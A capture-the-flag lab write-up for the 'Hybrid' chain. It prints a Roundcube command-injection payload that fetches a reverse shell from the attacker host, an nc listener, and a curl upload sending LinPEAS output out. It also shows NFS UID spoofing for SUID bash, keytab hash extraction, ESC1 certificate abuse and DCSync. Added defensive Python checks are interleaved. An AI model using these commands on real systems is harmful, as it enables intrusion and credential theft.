
Chain - Hybrid

Writeup Author: bobbuilder


Overview

Category: Chain

Difficulty: Easy Windows

Machine Author: xct

Domain: hybrid.vl

Machines: Linux (mail01.hybrid.vl) and Windows (DC and user endpoints)

Objective: Domain Admin compromise via NFS, Roundcube RCE, KeePass extraction, and certificate-based LDAP authentication (Schannel) that works without PKINIT.

Reconnaissance & Initial Access

The Linux machine hosts a web server, which turns out to be a login portal for Roundcube Webmail.

Roundcube Webmail Enumeration

We identify http://mail01.hybrid.vl/ running Roundcube. Downloading the project's source code shows a CHANGELOG.md in the repository root; on the Linux machine http://ip/CHANGELOG.md is reachable and discloses the installed version of the app.


Gaining User1 – Exploiting Roundcube (Linux)

NFS Mount to Discover Credentials

showmount -e 10.10.173.134
sudo mount -t nfs 10.10.173.134:/ ./target-NFS/ -o nolock
ls target-NFS/opt/share/backup.tar.gz

The backup contains /etc/dovecot, from which we extract the following credentials:

admin@hybrid.vl:<REDACTED>
peter.turner@hybrid.vl:<REDACTED>

Roundcube Exploitation (RCE)

After logging into the web app we see the "markasjunk" plugin is enabled; it has a known command-injection vulnerability (RCE) reachable through the identity email address, which the steps below abuse.

  1. Login as peter.turner@hybrid.vl.
  2. Create identity with RCE payload:
    admin%26curl${IFS}-o${IFS}/tmp/shell.php${IFS}<MY_IP>/php-reverse-shell.php%26%40hybrid.vl
    
  3. Send email and move it to Junk folder to trigger payload.
  4. Repeat with the payload to trigger the reverse shell:
    admin%26php${IFS}/tmp/shell.php%26%40hybrid.vl
    
  5. Listen on attacker box:
    nc -lvvp 1234
    
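As an added example (not part of the original writeup), the following Python shows the defensive counterpart of the steps above: URL-decoding a submitted identity address the way the web layer would and rejecting anything that is not a plain address before it can reach a shell. The two payload strings from the writeup are used as constructed sample input; the function and variable names are my own.

```python
import re
from urllib.parse import unquote

# Conservative address grammar: local-part and domain limited to characters a
# mail identity legitimately needs; anything else is rejected outright.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$")

# Characters that only make sense if the value is going to reach a shell.
SHELL_INDICATORS = ("&", ";", "|", "`", "$", "(", ")", "<", ">", "\n", "{", "}")


def decode_form_value(raw):
    """URL-decode a submitted form field; the payloads in the writeup hide '&'
    as %26 and '@' as %40 so they pass through the HTTP layer intact."""
    return unquote(raw)


def is_safe_identity_address(raw):
    """True only if the decoded value is a plain address with no shell syntax."""
    decoded = decode_form_value(raw)
    if any(ch in decoded for ch in SHELL_INDICATORS):
        return False
    return ADDRESS_RE.fullmatch(decoded) is not None


def flag_identity_submissions(submissions):
    """Return (user, decoded value) pairs that fail validation, e.g. to raise an
    alert when an identity is created with something that is not an address."""
    flagged = []
    for user, raw in submissions:
        if not is_safe_identity_address(raw):
            flagged.append((user, decode_form_value(raw)))
    return flagged


# Constructed sample: two legitimate identities followed by the two payload
# strings from the writeup, as a web front end would receive them.
SAMPLE_SUBMISSIONS = [
    ("peter.turner", "peter.turner%40hybrid.vl"),
    ("admin", "admin@hybrid.vl"),
    ("peter.turner", "admin%26curl${IFS}-o${IFS}/tmp/shell.php${IFS}<MY_IP>/php-reverse-shell.php%26%40hybrid.vl"),
    ("peter.turner", "admin%26php${IFS}/tmp/shell.php%26%40hybrid.vl"),
]

if __name__ == "__main__":
    for user, value in flag_identity_submissions(SAMPLE_SUBMISSIONS):
        print(f"rejected identity for {user}: {value!r}")
```

Decoding before validating matters: checked as raw form data, `%26` looks harmless, but after decoding it is the `&` that splits the injected command, and `${IFS}` is the whitespace substitute the payload uses because a literal space would break the address field.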

Privilege Escalation to Peter (Linux)

LinPEAS Discovery

Upload results:

curl -X POST http://<MY_IP>/upload -F 'files=@linoutput.txt' --insecure

LinPEAS shows that /opt/share (the directory exported over NFS) is writable. Because the export accepts whatever UID the client presents, we can create a local user with Peter's UID on the attacker box and drop a SUID bash that the server sees as owned by Peter.

Exploit: Spoof UID & Set SUID Bash

  1. On victim (inside /opt/share, the exported directory):
    id peter.turner@hybrid.vl  # UID=902601108
    cp /bin/bash initbash
    
  2. On attacker (with the NFS export mounted):
    sudo useradd -u 902601108 peter.turner@hybrid.vl
    sudo su -s /bin/bash 'peter.turner@hybrid.vl'   # act with Peter's UID on the mount
    cp initbash bash      # the copy is now owned by UID 902601108 on the server
    chmod +s bash
    
  3. On victim:
    ./bash -p   # -p keeps the effective UID of the SUID owner
    id
    

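The UID spoofing above works because of how the export is configured, so here is an added Python audit (my own code, not from the writeup or the machine) that parses `/etc/exports` lines and flags the conditions that make it possible: a writable export under AUTH_SYS (no `sec=krb5*`) without `all_squash`, `no_root_squash`, and writable exports offered to every host. The exports content is a constructed sample.

```python
# Constructed sample in /etc/exports syntax; not the real file from the box.
SAMPLE_EXPORTS = """\
# path        client(options)
/opt/share  *(rw,sync,no_subtree_check)
/srv/backup 10.10.0.0/16(rw,sync,no_root_squash)
/srv/public *(ro,sync,all_squash,anonuid=65534,anongid=65534)
/srv/secure *(rw,sync,sec=krb5p,all_squash)
"""


def parse_exports(text):
    """Return (path, client, [options]) for every client spec in an exports file."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            client, _, rest = spec.partition("(")
            options = [o for o in rest.rstrip(")").split(",") if o]
            entries.append((path, client, options))
    return entries


def audit_export(path, client, options):
    """Findings for one export. With AUTH_SYS (the default, no sec=krb5*) the
    server trusts whatever UID the client asserts; root_squash only remaps
    uid 0, so any other UID can be impersonated by creating a local user with
    that UID on the client, which is exactly the trick used above."""
    findings = []
    writable = "rw" in options
    kerberos = any(o.startswith("sec=krb5") for o in options)
    if "no_root_squash" in options:
        findings.append("no_root_squash: client root writes as uid 0 on the server")
    if writable and not kerberos and "all_squash" not in options:
        findings.append("AUTH_SYS with unsquashed UIDs on a writable export: "
                        "client-chosen UIDs are honoured, so SUID files owned "
                        "by a real user can be planted")
    if writable and not kerberos and client == "*":
        findings.append("writable AUTH_SYS export offered to every host")
    return findings


def audit_exports(text):
    """Map 'path client' -> findings for every client spec in the file."""
    return {f"{path} {client}": audit_export(path, client, options)
            for path, client, options in parse_exports(text)}


if __name__ == "__main__":
    for export, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(export, "->", findings or "ok")
```

The `/srv/secure` line shows the configuration that actually closes the hole: Kerberos (`sec=krb5p`) ties the UID to an authenticated principal rather than a number the client picks, and `all_squash` means nothing written through the export is owned by a real local user.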
Gaining User2 – KeePass + SSH Access

  1. Copy KeePass file:

    cp /home/peter.turner@hybrid.vl/passwords.kdbx /opt/share/
    
  2. Open the KeePass database with Peter's credentials (the password recovered from the NFS backup) and extract the SSH password:

    Username: peter.turner
    Password: <REDACTED>
    
  3. SSH into the Linux machine:

    ssh peter.turner@hybrid.vl@10.10.173.134
    
  4. Escalate:

    sudo -l
    sudo su
    

Gaining Root – Lateral Movement (Windows Domain)

Enumerate SMB Shares

nxc smb hybrid.vl -u 'peter.turner' -p '<REDACTED>' --shares

BloodHound & ADCS Enumeration

bloodhound-python -c all -u 'peter.turner' -p '<REDACTED>' -d hybrid.vl -ns 10.10.130.229
certipy find -u 'peter.turner@hybrid.vl' -p '<REDACTED>' -stdout -debug -scheme ldaps -vulnerable

Certipy identifies an ESC1-vulnerable template, HybridComputers, which is enrollable by Domain Computers: the requester supplies the subject, the template allows client authentication, and no approval is required.
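To make the ESC1 conditions concrete from the defender's side, here is an added Python check (not from the writeup or from Certipy) that evaluates template attributes the way an AD CS audit would: the enrollee-supplies-subject flag, an authentication-capable EKU, no manager approval, no authorized signatures, and enrollment rights granted to a broad group. The template attribute values are constructed; only the name HybridComputers comes from the page, and the "hardened" and "Machine" entries are invented for contrast.

```python
# Flag bits as defined for the AD CS template attributes.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # in msPKI-Enrollment-Flag (manager approval)

# EKUs that let the issued certificate authenticate a principal.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

# Groups that effectively mean "any domain principal of that kind".
LOW_PRIVILEGE_PRINCIPALS = {"Domain Users", "Domain Computers",
                            "Authenticated Users", "Everyone"}


def esc1_findings(template):
    """Return the reasons a template meets every ESC1 condition, or [] as soon
    as one condition fails (the template is then not ESC1 by this check)."""
    reasons = []
    if not template["enabled"]:
        return reasons
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        return []
    reasons.append("requester supplies the subject/SAN (ENROLLEE_SUPPLIES_SUBJECT)")
    ekus = set(template["pKIExtendedKeyUsage"])
    if ekus and not ekus & AUTH_EKUS:
        return []
    reasons.append("EKU permits authentication" if ekus else "no EKU restriction (any purpose)")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return []
    reasons.append("no manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        return []
    reasons.append("no authorized signature required")
    broad = sorted(set(template["enrollment-rights"]) & LOW_PRIVILEGE_PRINCIPALS)
    if not broad:
        return []
    reasons.append("enrollment rights granted to " + ", ".join(broad))
    return reasons


def audit_templates(templates):
    """Map template name -> ESC1 reasons for every template that is vulnerable."""
    return {name: esc1_findings(t) for name, t in templates.items() if esc1_findings(t)}


# Constructed attribute values (hypothetical, not read from the real domain).
SAMPLE_TEMPLATES = {
    "HybridComputers": {
        "enabled": True,
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment-rights": ["Domain Computers", "Domain Admins"],
    },
    # Same template with the subject flag cleared: the CA builds the subject
    # from the requester's own AD object, so the UPN can no longer be chosen.
    "HybridComputers-hardened": {
        "enabled": True,
        "msPKI-Certificate-Name-Flag": 0,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment-rights": ["Domain Computers", "Domain Admins"],
    },
    # Authentication EKU but approval required and only admins may enroll.
    "Machine": {
        "enabled": True,
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment-rights": ["Domain Admins"],
    },
}

if __name__ == "__main__":
    for name, reasons in audit_templates(SAMPLE_TEMPLATES).items():
        print(name, "is ESC1:", "; ".join(reasons))
```

Every condition has to hold at once, which is why the fix can be any single one of them: clearing the subject flag is the usual choice, but requiring manager approval or restricting enrollment to a small group also removes the template from the result.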


Exploiting ADCS Without PKINIT

Extracting Ticket from Linux Keytab

  1. Transfer /etc/krb5.keytab and validate:

    kinit 'MAIL01$@HYBRID.VL' -k -t krb5.keytab
    klist
    
  2. Extract NTLM hash:

    python3 keytabextract.py krb5.keytab
    

Abuse ESC1 Certificate Template

  1. Request certificate:

    certipy req -u 'mail01$' -hashes :<NTLM_HASH> -ca hybrid-DC01-CA -template HybridComputers -upn Administrator@hybrid.vl -target-ip 10.10.211.85 -key-size 4096
    
  2. Extract private key:

    certipy cert -pfx administrator.pfx -nocert -out administrator.key
    

Authenticate Without PKINIT (Schannel)

  1. Elevate Peter’s privileges:

    python3 passthecert.py -crt administrator.crt -key administrator.key -dc-ip 10.10.211.85 -action modify_user -target peter.turner -elevate -domain hybrid.vl
    
  2. DCSync as peter.turner:

    impacket-secretsdump hybrid.vl/peter.turner:'<REDACTED>'@10.10.211.85 -just-dc